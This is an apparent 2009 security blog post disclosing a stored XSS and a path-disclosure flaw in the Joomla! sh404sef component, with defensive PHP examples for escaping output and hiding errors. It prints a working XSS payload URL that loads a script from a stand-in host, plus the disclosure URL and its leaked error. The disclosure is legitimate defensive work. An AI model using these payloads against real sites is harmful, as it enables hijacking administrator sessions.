jeffchannell.com

sh404sef URI XSS Vulnerability

Posted in Joomla!
2009-06-08 22:01:58 +0000 UTC

Not too long ago, while doing some routine pentesting of my site, I came across two vulnerabilities in the Joomla! component sh404sef.

The first is a stored cross-site scripting (XSS) flaw. sh404sef logs the URI of every request that produces a 404 and later displays those URIs to administrators, so a specially crafted request to a site running sh404sef plants a script that will run in the administrator side of the site:

http://vulnerable.com/<script src=http://badsite.com/evil.js></script>

Once that request has been logged, any administrator who opens the URL Manager and views the 404 Errors list executes the script in their own browser, inside their authenticated administrator session, so it can do anything the admin can. I leave it as an exercise to the reader to figure out the next step.
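The flaw and its fix, as an added example (this is not sh404sef's code, and the array standing in for the 404 log table is a constructed sample): a 404 logger stores the requested path and an admin page prints it. The vulnerable renderer writes the stored string straight into the HTML; the hardened one escapes it at output time.

```php
<?php
// Added example, not code from sh404sef or Joomla!: how an unescaped 404 log
// becomes stored XSS, and the fix. The log entries below are constructed; the
// first is the payload from the post, the second an innocent mistyped path.
$logged404s = array(
    '/<script src=http://badsite.com/evil.js></script>',
    '/about-uss',
);

// Vulnerable rendering: the stored URI is concatenated into the admin page
// unchanged, so the <script> element the attacker requested is parsed and
// executed by the administrator's browser, with the administrator's session.
function render404TableVulnerable(array $uris)
{
    $html = "<table>\n";
    foreach ($uris as $uri) {
        $html .= "<tr><td>" . $uri . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Hardened rendering: escape at output time. ENT_QUOTES also neutralises both
// quote styles, so the same call is safe inside attribute values; the charset
// argument must match the page's declared encoding.
function render404TableSafe(array $uris)
{
    $html = "<table>\n";
    foreach ($uris as $uri) {
        $html .= "<tr><td>" . htmlspecialchars($uri, ENT_QUOTES, 'UTF-8') . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

echo render404TableVulnerable($logged404s);
echo render404TableSafe($logged404s);
```

In the hardened output the angle brackets arrive as `&lt;` and `&gt;`, so the browser shows the attacker's request as text instead of loading evil.js. Note that the fix belongs at output, not at logging time: the log should keep the exact request for investigation, and escaping on the way in would not protect a second view (an export, an RSS feed) that renders the same data elsewhere.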

The second vulnerability I found is simpler, an information disclosure that is only useful for reducing the amount of effort needed for further penetration. By visiting the URL:

http://vulnerable.com/index.php?option=com_sh404sef

... an attacker is presented with an interesting error:

Fatal error: Class 'sef_sh404sef' not found in /home/****/public_html/administrator/components/com_sh404sef/sh404sef.class.php(3203) : eval()'d code on line 1 

This gives an attacker the account name of the site's user on the host (the directory under /home/), most useful for attempts at gaining FTP or SFTP access, along with the full filesystem path to the component's code. The message reaches the client only because PHP is configured to display errors in the response; disabling that in production hides the details but does not remove the underlying fatal error.
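As an added example (not sh404sef or Joomla! code), a bootstrap that a site owner can put at the top of the entry script so that a fatal error like the one above produces a generic 500 instead of a message full of paths. The log path is an assumption; the class name is the one from the error message, used here only to reproduce the same kind of failure.

```php
<?php
// Added example, not code from sh404sef or Joomla!: keep PHP fatal errors out
// of the HTTP response and in a server-side log. Must run before any other code.

// Never send error text to the client; record it server-side instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/php/app_errors.log'); // assumed path, outside the web root

// Fatal errors bypass set_error_handler(), but shutdown functions still run.
// error_get_last() tells us whether the script died on one, so we can answer
// with a generic page. The detail was already written to the log by log_errors.
function genericFatalErrorPage()
{
    $err = error_get_last();
    if ($err === null) {
        return; // normal shutdown
    }
    $fatal = E_ERROR | E_PARSE | E_CORE_ERROR | E_COMPILE_ERROR | E_USER_ERROR;
    if (($err['type'] & $fatal) === 0) {
        return; // warnings and notices: logged, not fatal
    }
    if (!headers_sent()) {
        header('HTTP/1.1 500 Internal Server Error', true, 500);
        header('Content-Type: text/plain; charset=UTF-8');
    }
    // No message, file or line: that is exactly what leaked username and path.
    echo 'Internal server error.';
}
register_shutdown_function('genericFatalErrorPage');

// Reproduce the failure from index.php?option=com_sh404sef: reference a class
// that was never loaded. Without the settings above, the response would carry
// the "Class 'sef_sh404sef' not found in /home/..." text.
new sef_sh404sef();
```

Run from a web server with the bootstrap in place, the response body is just "Internal server error." and the path ends up in the configured error log. This is a mitigation for the disclosure, not a fix for the component; the component itself still fails on that request until it is updated.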

These vulnerabilities are fixed as of version 1.0.20 Beta Build 237; sites running an earlier build should upgrade.

Timeline